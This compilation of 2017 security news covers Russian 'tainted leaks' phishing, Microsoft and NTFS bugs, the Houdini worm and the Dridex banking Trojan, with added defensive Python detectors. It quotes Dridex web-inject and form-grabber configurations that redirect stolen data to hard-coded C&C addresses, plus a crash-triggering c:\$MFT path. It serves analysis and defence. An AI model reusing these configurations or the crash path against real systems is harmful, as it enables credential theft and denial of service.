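The two tricks described above, a google.com/amp/ open redirect in front of a URL shortener and a host name that merely contains google.com, are the kind of signals a mail gateway or log triage script can flag. This added Python example (not Citizen Lab's code) classifies URLs on those two signals; the shortener list, the two-label registrable-domain shortcut and the made-up shortener path standing in for the redacted one are assumptions.

```python
from urllib.parse import urlsplit, unquote

# Assumption: a small illustrative list of URL shorteners; real tooling would use a fuller one.
SHORTENER_HOSTS = {"tiny.cc", "bit.ly", "goo.gl", "t.co", "ow.ly"}


def refang(url):
    """Undo the hxxp / [.] defanging used in the article so the URL can be parsed."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def registrable_domain(host):
    """Last two labels of a host name. Adequate for .com/.ga style names as in the
    article; production code should consult the public suffix list instead."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def looks_like_google(host):
    """'google.com' appears in the name, but the part that actually resolves is another domain."""
    host = host.lower()
    return "google.com" in host and registrable_domain(host) != "google.com"


def amp_target_host(url):
    """For a google.com/amp/<target> viewer URL return the target's host, else None.
    The AMP cache path is 'host/path' for http targets and 's/host/path' for https."""
    parts = urlsplit(refang(url))
    if registrable_domain(parts.hostname or "") != "google.com":
        return None
    path = unquote(parts.path)
    if not path.startswith("/amp/"):
        return None
    target = path[len("/amp/"):]
    if target.startswith("s/"):
        target = target[2:]
    return target.split("/", 1)[0].lower() or None


def classify(url):
    """Label a URL from the two signals described in the article: a google.com AMP
    redirect (worse when it points at a shortener) and a lookalike host."""
    host = urlsplit(refang(url)).hostname or ""
    if looks_like_google(host):
        return "lookalike host"
    target = amp_target_host(url)
    if target in SHORTENER_HOSTS:
        return "amp redirect to shortener"
    if target is not None:
        return "amp redirect"
    return "unflagged"


# Constructed samples: the first two follow the URLs quoted in the article
# (with a made-up shortener path in place of the redacted one).
SAMPLES = [
    "https://www.google.com/amp/tiny.cc/abc123",
    "hxxp://myaccount.google.com-changepassword-securitypagesettingmyaccountgooglepagelogin.id833[.]ga/security/signinoptions/password",
    "https://www.google.com/amp/s/example.org/article",
    "https://myaccount.google.com/security",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample), "<-", sample)
```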
"After highlighting the similarities between this campaign and those documented by previous research, we round out the picture on Russia-linked operations by showing how related campaigns that attracted recent media attention for operations during the 2016 United States presidential election also targeted journalists, opposition groups, and civil society," Citizen Lab wrote.
Citizen Lab researchers were able to identify the campaign after analyzing two phishing emails sent to David Satter, an American journalist and Kremlin critic who was banned from Russia in 2014.

Connection with DNC and French President Leak
According to Citizen Lab, the approach and techniques used in the campaign appear similar to the hacking attempts that hit Hillary Clinton's presidential campaign chairman John Podesta last year and the recent one that targeted French President Emmanuel Macron.
"In the 2017 French presidential election, tainted leaks appear to have been used in an attempt to discredit the political party and candidate for election directly," the researchers said.
US intelligence officials have previously determined that the Russian government was behind the attacks on Podesta and other Democratic officials. Now, Citizen Lab says the Russian government was behind the recent phishing campaign and the subsequent manipulation of Satter's e-mail.
Besides Satter, the same phishing campaign also targeted 218 other individuals, including politicians and other government officials, members of cabinets from Europe and Eurasia, journalists, academics, CEOs of energy and mining companies, UN officials, and high-ranking military personnel from more than a dozen countries, including the United States and NATO.
Tainted Leaks: A New Threat
CyberBerkut, a self-described pro-Russian group, published some of the documents obtained from Satter's email account, one of which had been manipulated so heavily that it made Satter appear to be paying Russian journalists and activists to post articles critical of the Russian government, which would subsequently be published by several media outlets.
"Tainted leaks are a growing and particularly troublesome addition to disinformation tactics, and in the current digital environment are likely to become more prevalent," the Citizen Lab researchers concluded.
"Tainted leaks—fakes in a forest of facts—test the limits of how media, citizen journalism, and social media users handle fact checking, and the amplification of enticing, but questionable information."
So the next time you come across a widespread data leak, do not trust it blindly until the authenticity of the leaked documents has been proved.


Microsoft silently patched a second critical Malware Protection Engine flaw
29.5.2017 securityaffairs Vulnerability

Microsoft silently patched a second critical vulnerability in its Malware Protection Engine that was discovered on May 12.
Microsoft has patched the critical vulnerability in its Malware Protection Engine that was discovered on May 12 by the researchers at the Google’s Project Zero team.

The vulnerability could be exploited by an attacker who crafts an executable that, when processed by the Malware Protection Engine’s emulator, triggers the remote code execution flaw.

On May 9, Google’s Project Zero discovered another flaw, tracked as CVE-2017-0290, that was fixed with an emergency patch released just three days after its disclosure.

According to Project Zero researcher Tavis Ormandy, unlike CVE-2017-0290, this bug was fixed silently. Ormandy had privately disclosed the vulnerability to Microsoft.

Tavis Ormandy (@taviso), 7:12 PM - 25 May 2017: “There is an undocumented opcode in the MsMpEng x86 emulator that can access internal emulator commands ¯\_(ツ)_/¯ https://bugs.chromium.org/p/project-zero/issues/detail?id=1260”

“MsMpEng includes a full system x86 emulator that is used to execute any untrusted files that look like PE executables. The emulator runs as NT AUTHORITY\SYSTEM and isn’t sandboxed,” Ormandy wrote in the bug report. “Browsing the list of win32 APIs that the emulator supports, I noticed ntdll!NtControlChannel, an ioctl-like routine that allows emulated code to control the emulator.”

The recently patched vulnerability is tied to the way the emulator processes files, while the previous one affected MsMpEng’s JavaScript interpreter.

The attacker can exploit the vulnerability to execute a number of control commands.

“Command 0x0C allows you to parse arbitrary attacker-controlled RegularExpressions to Microsoft GRETA (a library abandoned since the early 2000s). This library is not safe to process untrusted Regex, a testcase that crashes MsMpEng attached. Note that only packed executables can use RegEx, the attached sample was packed with UPX. ¯\_(ツ)_/¯
Command 0x12 allows you to load additional “microcode” that can replace opcodes. At the very least, there is an integer overflow calculating number of opcodes provided (testcase attached). You can also redirect execution to any address on a “trusted” page, but I’m not sure I understand the full implications of that.
Various commands allow you to change execution parameters, set and read scan attributes and UFS metadata (example attached). This seems like a privacy leak at least, as an attacker can query the research attributes you set and then retrieve it via scan result.” reads the advisory.
The vulnerability is difficult to exploit: even though MsMpEng itself isn’t sandboxed, many applications are, so an attacker would first need to evade the application’s sandbox to trigger the issue.

According to Ormandy, the emulator component emulates the client’s CPU, but Microsoft has given it an extra instruction that allows API calls. The researcher said he was surprised to find a special set of instructions for the emulator.

Microsoft did not publish any security advisory for this vulnerability.


FileSystem NTFS Bug Crashes Windows 7 and Windows 8.1
29.5.2017 securityaffairs Vulnerability

A FileSystem NTFS bug could be exploited to crash Windows 7 and Windows 8.1; using the Chrome browser avoids the problem.
Until Microsoft patches this problem, use Chrome: a slip in file-path handling allows an attacker to crash Windows 7 and Windows 8.1 with a single file call.

A bug in the way Microsoft handles file paths could be exploited by attackers to crash Windows 7 and Windows 8.1 with a simple file call.

The vulnerability is triggered every time a file call references the Windows Master File Table ($MFT), for example if an attacker includes $MFT in the path of an image linked from a website.

The Russian expert “Anatolymik” of Alladin Information Security first reported the issue. He discovered it while debugging and reverse engineering the NTFS driver.

NTFS bug

Every file on an NTFS volume has a reference in the MFT; for this reason, the OS must protect $MFT from user access. The Russian researcher discovered that if you try to access a file like

c:\$MFT\foo

the NT file system (NTFS) locks $MFT and simply doesn’t release it.

“When an attempt is made to open a file relative to the $mft file, the NtfsFindStartingNode function does not find it, because this function searches a little differently, unlike the NtfsOpenSubdirectory function, which finds the file at all times,” reads the description of the problem published by the expert.

“Consequently, the work cycle begins, starting with the root of the file system. Next, the NtfsOpenSubdirectory function opens the file and takes its ERESOURCE exclusively. On the next iteration, the loop detects that the file is not a directory and thus interrupts its job with an error. At the conclusion of its work, the NtfsCommonCreate function tries to close it by means of the NtfsTeardownStructures function. The NtfsTeardownStructures function, in turn, faces the fact that it will not be able to close the file, because the file system itself opens it when mounting. At the same time, contrary to the expectations of the NtfsCommonCreate function, the NtfsTeardownStructures function frees the ERESOURCE of the $mft file. Thus, it will be captured forever.”
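As an added example (not code from the researcher or from Bleeping Computer), the following conservative check flags file references that use $MFT as if it were a directory, the pattern that hangs Windows 7/8.1 according to the write-up; a content filter or proxy could use it to refuse such image links. The HTML sample and the helper names are constructed for this illustration.

```python
import re
from urllib.parse import unquote

# Added example, not from the original article: a conservative check for
# references of the form c:\$MFT\<something>, i.e. paths that treat the
# protected $MFT metafile as a directory. Opening $MFT itself (c:\$MFT) is
# simply denied by the OS, so only references with components after $MFT are
# flagged.

def _path_components(ref):
    """Normalise a path, file:// URL or \\?\ device path into components."""
    s = unquote(ref.strip())
    if s.lower().startswith("file:"):
        s = s[5:].lstrip("/")          # file:///c:/$MFT/x -> c:/$MFT/x
    s = s.replace("\\", "/")
    # strip the \\?\ and \\.\ device prefixes (//?/ and //./ after normalising)
    if s.startswith("//?/") or s.startswith("//./"):
        s = s[4:]
    return [p for p in s.split("/") if p]

def references_mft_subpath(ref):
    """True if $MFT appears as a non-final path component, e.g. c:\\$MFT\\foo.

    The match is case-insensitive and position-independent, which is
    deliberately broader than the root-level example in the article.
    """
    parts = _path_components(ref)
    return any(p.lower() == "$mft" for p in parts[:-1])

_ATTR = re.compile(r"""(?:src|href)\s*=\s*["']([^"']+)["']""", re.IGNORECASE)

def find_mft_references(html):
    """Return the src/href values in an HTML fragment that would trip the bug."""
    return [v for v in _ATTR.findall(html) if references_mft_subpath(v)]

# Constructed sample page for demonstration (not from the article).
SAMPLE_HTML = """
<img src="https://example.invalid/logo.png">
<img src="file:///c:/$MFT/pixel.gif">
<a href="C:\\$mft\\readme.txt">link</a>
<img src="c:\\images\\$MFT.png">
"""

if __name__ == "__main__":
    for hit in find_mft_references(SAMPLE_HTML):
        print("blocked:", hit)
```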

According to Bleeping Computer, users who have tested the issue have noticed that the bug cannot be triggered in Chrome because the Google browser will not allow loading images with malformed paths, such as the $MFT exploit.

“According to users that have tested the bug and commented on Anatolymik’s blog post, Chrome will refuse to load images with malformed paths, such as the $MFT exploit.” states the blog post published on Bleeping Computer.

“Nonetheless, Bleeping Computer confirmed that the $MFT bug causes a Windows 7 installation to hang via Internet Explorer and Firefox.”

This NTFS bug is very similar to another file path vulnerability discovered in the 1990s, when you could trigger a system crash with the “C:/con/con” bug. That bug affected Windows 95 and Windows 98 systems.


Austrian parties SPÖ and ÖVP want Whatsapp monitoring
29.5.2017 securityaffairs BigBrothers

The Austrian SPÖ and ÖVP parties are pushing for the monitoring of WhatsApp instant messaging and plan further measures to fight terrorism.
Both the Social Democratic Party of Austria (SPÖ) and the Austrian People’s Party (Österreichische Volkspartei; ÖVP) are pushing for the monitoring of instant messaging services such as WhatsApp.

Experts believe that the Government will end anonymous mobile phone SIM cards after the election.

The recent terrorist attack at the Manchester Arena is fueling the discussion about state surveillance measures adopted in Austria to fight terrorism in the country.

According to the director of the Federal Office for Constitutional Protection and Terrorism, Peter Gridling, there is a concrete risk of an imminent attack.

“‘Concrete suspicious moments’ for an imminent terrorist attack in Austria so far,” said Gridling on Friday evening on “ZiB2”.

The BAT director described it as an “illusion to believe that one succeeds in keeping 300 people around the clock under observation.” “Priorities should be set. This could lead to situations where people classified as marginalized persons (…) are seen to be important actors,” he said, referring to the Manchester terrorist attack.

Whatsapp monitoring surveillance

ÖVP chief Sebastian Kurz is urging additional efforts by law enforcement and intelligence agencies against terrorists. In March, the ÖVP presented a follow-up to the previous data retention and proposed an update to the law to allow the monitoring of WhatsApp and Skype.

“We are waiting until now for a release to take the further steps to the implementation,” said Brandstetter spokesman Jim Lefebre to the STANDARD. SPÖ spokesman Johannes Jarolim was surprised at the statements.

The government has already approved a security package that may address Skype and WhatsApp monitoring without a Bundestrojaner, the term used for state-sponsored trojans, aka the Federal Trojan.

“Without the help of a Bundestrojaner, as Brandstetter has announced,” Jarolim said.

The principal problem is the impossibility of spying on end-to-end encrypted communications without the use of surveillance software or the presence of a backdoor in the encryption algorithms.

In Germany, authorities rely on state surveillance software that is secretly installed on mobile devices to monitor the activities of suspects and exfiltrate data.

Vice Chancellor Brandstetter assumes that WhatsApp users can be monitored with software that can be acquired through an international tender.

On the market there are a number of applications that can be used to access WhatsApp chats from backups, one of them being Elcomsoft Explorer for WhatsApp, but they cannot be used to access communications in real time.

Another measure under discussion that could be included in the security package is a regulation ending anonymous mobile SIM cards.

While SPÖ and ÖVP have already agreed on extending monitoring methods, the parties are still negotiating the end of anonymous mobile SIM cards.

“The plans came from Interior Minister Wolfgang Sobotka (ÖVP) and Hans Peter Doskozil (SPÖ), who agreed on fewer negotiating hours.” reported the Austrian agency Derstandard.at.


Houdini Worm Gets Posted to Paste Sites

28.5.2017 securityweek Virus
Recorded Future security researchers recently discovered that the Houdini worm has been posted hundreds of times on paste sites over the past several months.

Also known as H-Worm, Houdini has been around since 2013, and was said in 2014 to have been created by Naser Al Mutairi from Kuwait. Later that year, the malware was reportedly used in APT campaigns in the Asia-Pacific region, while last year it was associated with the Moonlight espionage campaign targeting the Middle East.

Earlier this year, after noticing an increase in malicious Visual Basic scripts (VBscript) posted on paste sites, Recorded Future had a closer look into the matter and discovered that most of the scripts were Houdini. Moreover, a single actor was found to be partially responsible for the identified malicious VBscripts posted on said sites.

“The individual(s) reusing this Houdini VBscript are continually updating with new command and control servers,” Recorded Future’s Daniel Hatheway explains in a blog post.

Analysis of the script variants revealed not only that they could connect to the defined command and control (C&C) server, but also that, after establishing connection, the malware would copy itself to a directory and then create a registry key in a startup location to achieve persistence.

Overall, the security researchers discovered a total of 213 posts to paste sites as of April 26. These included 105 unique subdomains, 1 domain, and 190 hashes, which showed that some of the posts were exact matches, while others used the same domain but contained other changes within the VBscript.

Further analysis revealed that the domains and subdomains used belong to a dynamic DNS provider, and that some of the active malware samples would communicate with at least one of the paste sites, in addition to the host defined in one of the VBscripts.

The subdomains registered at a dynamic DNS provider didn’t prove helpful in terms of registration data, but one domain, microsofit[.]net, helped the researchers determine that the individual registering the domain used the name “Mohammed Raad.” The actor also used the email “vicsworsbaghdad@gmail.com” and set Germany as their country.

While the Houdini posts on paste sites were published from guest accounts and couldn’t be tied to a single person, the subdomains associated with the VBscripts appeared to be a play on the name “Mohammed Raad,” thus linking the malware to the microsofit[.]net domain.

“A Google search on “Mohammed Raad” revealed a Facebook profile of an individual who claims to be part of “Anonymous,” from Germany, and uses “Vicswors Baghdad” as an alias. This profile is identical to the registration information from microsofit[.]net,” Hatheway notes.

What’s more, the Facebook profile was found to display a recent conversation pertaining to an open source ransomware called “MoWare H.F.D”. Thus, the researcher concluded that the same actor might be studying, testing, and possibly configuring the ransomware.

A closer look at the screenshot posted on the “vicsworsbaghdad” Facebook profile revealed that the ransomware is available by commenting on the creator's YouTube video. Next, the security researcher discovered that an account “Vicswors Baghdad” commented asking for information about the download.

The account, Hatheway says, uses the same email “vicsworsbaghdad@gmail.com” as the registration of microsofit[.]net. Moreover, the researcher discovered a profile for “Vicswors Baghdad” on 0day[.]today, but no activity was associated with it.


British Airways cancels thousands of flights, there is no evidence of cyber-attacks
28.5.2017 securityaffairs Cyber

British Airways canceled all flights from Gatwick and Heathrow due to an IT failure; company operations worldwide suffered severe delays.
In the last 24 hours, British Airways has canceled all flights from Gatwick and Heathrow and flights worldwide suffered major delays due to a severe IT failure.

Global operations were affected and, at the time of writing, the company is trying to restore them.

An IT problem appears to be the root cause of the decision to cancel all flights from both airports before 6 pm UK time on Saturday.
The system failure affected the principal systems used by British Airways, including the booking system, baggage handling, mobile phone apps and check-in desks.

“Following the major IT system failure experienced earlier today, with regret we have had to cancel all flights leaving from Heathrow and Gatwick for the rest of Saturday,” a spokeswoman said.

“We are working hard to get our customers who were due to fly today on to the next available flights over the course of the rest of the weekend. Those unable to fly will be offered a full refund.”

More than 1,000 flights were affected; scenes of panic and confusion were observed in the airports, and travelers complained that they had been left in the dark.

“More than 1,000 flights were affected. At Heathrow alone, BA had 406 flights scheduled to depart after 9am and a further 71 at Gatwick, according to flightstats.com on Saturday.” reported The Guardian.

“We are extremely sorry for the huge inconvenience this is causing our customers and we understand how frustrating this must be, especially for families hoping to get away on holiday,” said Chief Executive Alex Cruz.

The airline’s Twitter account was constantly updated about the situation; the company told travelers not to go to the airport unless they had a confirmed booking for travel.

While the airports were paralyzed, rumors of a cyber attack were circulating on the Internet; the recent massive WannaCry ransomware attack had demonstrated the fragility of computer systems worldwide.

British Airways promptly denied this hypothesis.

“We’ve found no evidence that it’s a cyber-attack.” said the company.


Sean Robinson @SeanRobinsonUU
BA: "We've found no evidence that it's a cyber attack."
4:55 PM - 27 May 2017
According to the GMB union, such problems are caused by the company’s policy of outsourcing hundreds of IT jobs to India.
Passengers have suffered serious problems on Friday due to a failure of the baggage system.

Passengers departing from the EU have some rights under EU law to claim compensation for delayed or canceled flights.

Airlines are required to give passengers food and drinks for delays of more than two hours; they also have to provide hotel accommodation and transfers for overnight delays.


Tainted Leaks – Widespread Russian disinformation campaign hit 39 countries
28.5.2017 securityaffairs CyberSpy

Researchers at Citizen Lab documented a Russian campaign of cyberespionage and disinformation that leveraged tainted leaks.
According to the researchers at the Citizen Lab at the University of Toronto, a Russian disinformation campaign targeted 39 countries.

The cyber attacks against the DNC were part of a larger campaign orchestrated by a nation state actor against government, military and industry targets, journalists, academics, opposition figures, and activists.

“Our report uncovers a major disinformation and cyber espionage campaign with hundreds of targets in government, industry, military and civil society. Those targets include a large list of high profile individuals from at least 39 countries (including members of 28 governments), as well as the United Nations and NATO,” wrote lead researcher Ronald Deibert. “Although there are many government, military, and industry targets, our report provides further evidence of the often-overlooked targeting of civil society in cyber espionage campaigns. Civil society — including journalists, academics, opposition figures, and activists — comprise the second largest group (21%) of targets, after government.”

Below is a list of notable targets shared by the researchers:

A former Russian prime minister
A former U.S. Deputy Under Secretary of Defense and a former senior director of the U.S. National Security Council
The Austrian ambassador to a Nordic country and the former ambassador to Canada for a Eurasian country
Senior members of the oil, gas, mining, and finance industries of the former Soviet states
United Nations officials
Military personnel from Albania, Armenia, Azerbaijan, Georgia, Greece, Latvia, Montenegro, Mozambique, Pakistan, Saudi Arabia, Sweden, Turkey, Ukraine, and the United States, as well as NATO officials
Politicians, public servants and government officials from Afghanistan, Armenia, Austria, Cambodia, Egypt, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Peru, Russia, Slovakia, Slovenia, Sudan, Thailand, Turkey, Ukraine, Uzbekistan and Vietnam
According to Deibert, Russian threat actors launched a large-scale campaign aimed at obtaining credentials and sensitive files from the victims. The state-sponsored hackers used the stolen data in carefully tainted leaks, created by mixing real and false information to influence the sentiment of a portion of the public on specific facts.

“Fake information scattered amongst genuine materials — “falsehoods in a forest of facts” as Citizen Lab’s John Scott-Railton referred to them — is very difficult to distinguish and counter, especially when it is presented as a salacious “leak” integrated with what otherwise would be private information.” Deibert said.

“Russia has a long history of experience with what is known as ‘dezinformatsiya,’ going back even to Soviet times,”

“Tainted leaks, such as those analyzed in our report, present complex challenges to the public. Fake information scattered amongst genuine materials — ‘falsehoods in a forest of facts’… is very difficult to distinguish and counter, especially when it is presented as a salacious ‘leak’ integrated with what otherwise would be private information.”

Citizen Lab links the campaign to the Russian government confirming the findings of many other reports published by security firms and intelligence agencies.

Among the victims, there is also the US journalist David Satter, who has written a lot on the corruption of politicians and entrepreneurs in Russia.

Once the hackers had stolen Satter’s e-mails, they “selectively modified” them and then “leaked” them to support the thesis that he was part of a CIA-backed plot to discredit Russian President Vladimir Putin.

“Following the compromise of his account, Satter’s stolen e-mails were selectively modified, and then “leaked” on the blog of CyberBerkut, a self-described pro-Russian hacktivist group. This report introduces the term “tainted leaks” to describe the deliberate seeding of false information within a larger set of authentically stolen data.” reads the report.

According to the Citizen Lab report, tainted leaks were also used to target officials from Afghanistan, Armenia, Austria, Cambodia, Egypt, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Peru, Russia, Slovakia, Slovenia, Sudan, Thailand, Turkey, Ukraine, Uzbekistan, and Vietnam.


Below are the key findings of the report:

Documents stolen from a prominent journalist and critic of the Russian government were manipulated and then released as a “leak” to discredit domestic and foreign critics of the government. We call this technique “tainted leaks.”
The operation against the journalist led us to the discovery of a larger phishing operation, with over 200 unique targets spanning 39 countries (including members of 28 governments). The list includes a former Russian Prime Minister, members of cabinets from Europe and Eurasia, ambassadors, high ranking military officers, CEOs of energy companies, and members of civil society.
After government targets, the second largest set (21%) are members of civil society including academics, activists, journalists, and representatives of non-governmental organizations.
We have no conclusive evidence that links these operations to a particular Russian government agency; however, there is clear overlap between our evidence and that presented by numerous industry and government reports concerning Russian-affiliated threat actors.


Dridex: A History of Evolution
28.5.2017 Kaspersky Virus

The Dridex banking Trojan, which has become a major financial cyberthreat in the past years (in 2015, the damage done by the Trojan was estimated at over $40 million), stands apart from other malware because it has continually evolved and become more sophisticated since it made its first appearance in 2011. Dridex has been able to escape justice for so long by hiding its main command-and-control (C&C) servers behind proxying layers. Given that old versions stop working when new ones appear and that each new improvement is one more step forward in the systematic development of the malware, it can be concluded that the same people have been involved in the Trojan’s development this entire time. Below we provide a brief overview of the Trojan’s evolution over six years, as well as some technical details on its latest versions.


How It All Began

Dridex made its first appearance as an independent malicious program (under the name “Cridex”) around September 2011. An analysis of a Cridex sample (MD5: 78cc821b5acfc017c855bc7060479f84) demonstrated that, even in its early days, the malware could receive dynamic configuration files, use web injections to steal money, and was able to infect USB media. This ability influenced the name under which the “zero” version of Cridex was detected — Worm.Win32.Cridex.

That version had a binary configuration file:

[screenshot not reproduced]

Sections named databefore, datainject, and dataafter made the web injections themselves look similar to the widespread Zeus malware (there may have been a connection between this and the 2011 Zeus source code leak).

Cridex 0.77–0.80

In 2012, a significantly modified Cridex variant (MD5: 45ceacdc333a6a49ef23ad87196f375f) was released. The cybercriminals had dropped functionality related to infecting USB media and replaced the binary format of the configuration file and packets with XML. Requests sent by the malware to the C&C server looked as follows:

<message set_hash="" req_set="1" req_upd="1">
<header>
<unique>WIN-1DUOM1MNS4F_A47E8EE5C9037AFE</unique>
<version>600</version>
<system>221440</system>
<network>10</network>
</header>
<data></data>
</message>
The <message> tag was the XML root element. The <header> tag contained information about the system, bot identifier, and the version of the bot.

Here is a sample configuration file:

<packet><commands><cmd id="1354" type="3"><httpinject><conditions><url type="deny">\.(css|js)($|\?)</url><url type="allow" contentType="^text/(html|plain)"><![CDATA[https://.*?\.usbank\.com/]]></url></conditions><actions><modify><pattern><![CDATA[<body.*?>(.*?)]]></pattern><replacement><![CDATA[<link href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
<style type="text/css">
.ui-dialog-titlebar{ background: white }
.text1a{font-family: Arial; font-size: 10px;}
With the exception of the root element <packet>, the Dridex 0.8 configuration file remained virtually unchanged until version 3.0.

Dridex 1.10

The “zero” version was maintained until June 2014. A major operation (Operation Tovar) to take down another widespread malicious program, Gameover Zeus, was carried out that month. Nearly as soon as Zeus was taken down, the “zero” version of Cridex stopped working, and Dridex version 1.100 appeared almost exactly one month afterward (on June 22).

[screenshot not reproduced]

Sample configuration file:

<root>
<settings hash="65762ae2bf50e54757163e60efacbe144de96aca">
<httpshots>
<url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url>
<url type="deny" onget="1" onpost="1">(resource\.axd|yimg\.com)</url>
</httpshots>
<formgrabber>
<url type="deny">\.(swf)($|\?)</url><url type="deny">/isapi/ocget.dll</url>
<url type="allow">^https?://aol.com/.*/login/</url>
<url type="allow">^https?://accounts.google.com/ServiceLoginAuth</url>
<url type="allow">^https?://login.yahoo.com/</url>
...
<redirects>
<redirect name="1st" vnc="0" socks="0" uri="http://81.208.13.10:8080/injectgate" timeout="20">twister5.js</redirect>
<redirect name="2nd" vnc="1" socks="1" uri="http://81.208.13.10:8080/tokengate" timeout="20">mainsc5.js</redirect>
<redirect name="vbv1" vnc="0" socks="0" postfwd="1" uri="http://23.254.129.192:8080/logs/dtukvbv/js.php" timeout="20">/logs/dtukvbv/js.php</redirect>
<redirect name="vbv2" vnc="0" socks="0" postfwd="1" uri="http://23.254.129.192:8080/logs/dtukvbv/in.php" timeout="20">/logs/dtukvbv/in.php</redirect>
</redirects>
<httpinjects>
<httpinject><conditions>
<url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://.*/tdsecure/intro\.jsp.*]]></url>
<url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url>
</conditions>
<actions>
<modify><pattern modifiers="msU"><![CDATA[onKeyDown\=".*"]]></pattern><replacement><![CDATA[onKeyDown=""]]></replacement></modify>
<modify><pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern><replacement><![CDATA[\1<style type="text/css">
body {visibility: hidden; }
</style>
...
This sample already has redirects for injected .js scripts that are characteristic of Dridex.

Here is a comparison between Dridex and Gameover Zeus injections:

[screenshot not reproduced]

Thus, the takedown of one popular botnet (Gameover Zeus) led to a breakthrough in the development of another, which had many strong resemblances to its predecessor.

We mentioned above that Dridex had begun to use PCRE, while its previous versions used SLRE. Remarkably, the only other banking malware that also used SLRE was Trojan-Banker.Win32.Shifu. That Trojan was discovered in August 2015 and was distributed through spam via the same botnets as Dridex. Additionally, both banking Trojans used XML configuration files.

We also have reasons to believe that, at least in 2014, the cybercriminals behind Dridex were Russian speakers. This is supported by comments in the command & control server’s source code:

[screenshot not reproduced]

And by the database dumps:

[screenshot not reproduced]

Dridex: from Version 2 to Version 3

By early 2015, Dridex implemented a kind of P2P network, which is also reminiscent of the Gameover Zeus Trojan. On that network, some peers (supernodes) had access to the C&C and forwarded requests from other network nodes to it. The configuration file was still stored in XML format, but it got a new section, <nodes>, which contained an up-to-date peer list. Additionally, the protocol used for communication with the C&C was encrypted.

Dridex: from Version 3 to Version 4

One of the administrators of the Dridex network was arrested on August 28, 2015. In the early days of September, networks with identifiers 120, 200, and 220 went offline. However, they came back online in October and new networks were added: 121, 122, 123, 301, 302, and 303.

Notably, the cybercriminals stepped up security measures at that time. Specifically, they introduced geo-filtering wherein an IP field appeared in C&C request packets, which was then used to identify the peer’s country. If it was not on the list of target countries, the peer received an error message.

In 2016, the loader became more complicated and encryption methods were changed. A binary loader protocol was introduced, along with a <settings> section, which contained the configuration file in binary format.

Dridex 4.x. Back to the Future

The fourth version of Dridex was detected in early 2017. It has capabilities similar to the third version, but the cybercriminals stopped using the XML format in the configuration file and packets and went back to binary. The analysis of new samples is rendered significantly more difficult by the fact that the loader now works for two days, at most. This is similar to Lurk, except that Lurk’s loader was only active for a couple of hours.

Analyzing the Loader’s Packets

The packet structure in the fourth version is similar to those in the late modifications of the loader’s 3.x versions. However, the names of the modules requested have been replaced with hashes:

[screenshot not reproduced]

Here is the function that implements C&C communication and uses these hashes:

[screenshot not reproduced]

Knowing the packet structure in the previous version, one can guess which hash relates to which module by comparing packets from the third and fourth versions.

In the fourth version of Dridex, there are many places where the CRC32 hashing algorithm is used, including hashes used to search for function APIs and to check packet integrity. It would make sense for hashes used in packets to be none other than CRC32 of requested module names. This assumption can easily be verified by running the following Python code:

[screenshot not reproduced]

That’s right – the hashes obtained this way are the same as those in the program’s code.
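The report's own Python snippet survives only as a screenshot, so here is an added example (not Kaspersky's code) of the check it describes: CRC32 written out in full, plus a resolver that maps observed packet hashes back to candidate module names. The module names below are constructed placeholders; the real names and hash values are not on this page.

```python
import zlib

# Added example, not the report's script: CRC-32 (reflected, polynomial
# 0xEDB88320, init/xorout 0xFFFFFFFF), which is what zlib.crc32 computes, and a
# helper that resolves 32-bit module hashes against a list of candidate names.

def crc32_table():
    """Build the standard reflected CRC-32 lookup table."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table

_TABLE = crc32_table()

def crc32(data, crc=0):
    """CRC-32 as used by zlib; written out so the algorithm is visible."""
    c = crc ^ 0xFFFFFFFF
    for b in data:
        c = _TABLE[(c ^ b) & 0xFF] ^ (c >> 8)
    return c ^ 0xFFFFFFFF

def matches_zlib(data):
    """Self-check: the hand-written CRC agrees with the library implementation."""
    return crc32(data) == (zlib.crc32(data) & 0xFFFFFFFF)

def resolve_module_hashes(observed, candidates):
    """Map each observed 32-bit hash to the candidate name whose CRC32 matches.

    Unmatched hashes map to None, so an analyst can see which module names
    are still unknown. Hashing is done over the raw ASCII bytes of the name.
    """
    by_hash = {crc32(name.encode("ascii")): name for name in candidates}
    return {h: by_hash.get(h) for h in observed}

# Constructed candidate module names (placeholders, not Dridex's real names).
CANDIDATE_MODULES = ["bot32", "bot64", "vnc32", "socks32"]

if __name__ == "__main__":
    # 0xDEADBEEF stands in for a hash whose module name is not yet known.
    seen = [crc32(b"bot32"), crc32(b"vnc32"), 0xDEADBEEF]
    for h, name in resolve_module_hashes(seen, CANDIDATE_MODULES).items():
        print(f"{h:08x} -> {name}")
```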

With regards to encryption of the loader’s packets, nothing has changed. As in Dridex version 3, the RC4 algorithm is used, with a key stored in encrypted form in the malicious program’s body.

One more change introduced in the fourth version is that a much stricter loader authorization protocol is now used. A loader’s lifespan has been reduced to one day, after which encryption keys are changed and old loaders become useless. The server responds to requests from all outdated samples with error 404.

Analysis of the Bot’s Protocol and Encryption

Essentially, the communication of Dridex version 4 with its C&C is based on the same procedure as before, with peers still acting as proxy servers and exchanging modules. However, encryption and packet structure have changed significantly; now a packet looks like the <settings> section from the previous Dridex version. No more XML.

[screenshot not reproduced]

The Basic Packet Generation function is used to create packets for communication with the C&C and with peers. There are two types of packets for the C&C:

Registration and transfer of the generated public key
Request for a configuration file
The function outputs the following packet:

[screenshot not reproduced]

A packet begins with the length of the RC4 key (74h) that will be used to encrypt strings in that packet. This is followed by two parts of the key that are the same size. The actual key is calculated by performing XOR on these blocks. Next comes the packet type (00h) and encrypted bot identifier.

Peer-to-Peer Encryption

Sample encrypted P2P packet:

[screenshot not reproduced]

The header of a P2P packet is a DWORD array, the sum of all elements in which is zero. The obfuscated data size is the same as in the previous version, but the data is encrypted differently:

[screenshot not reproduced]

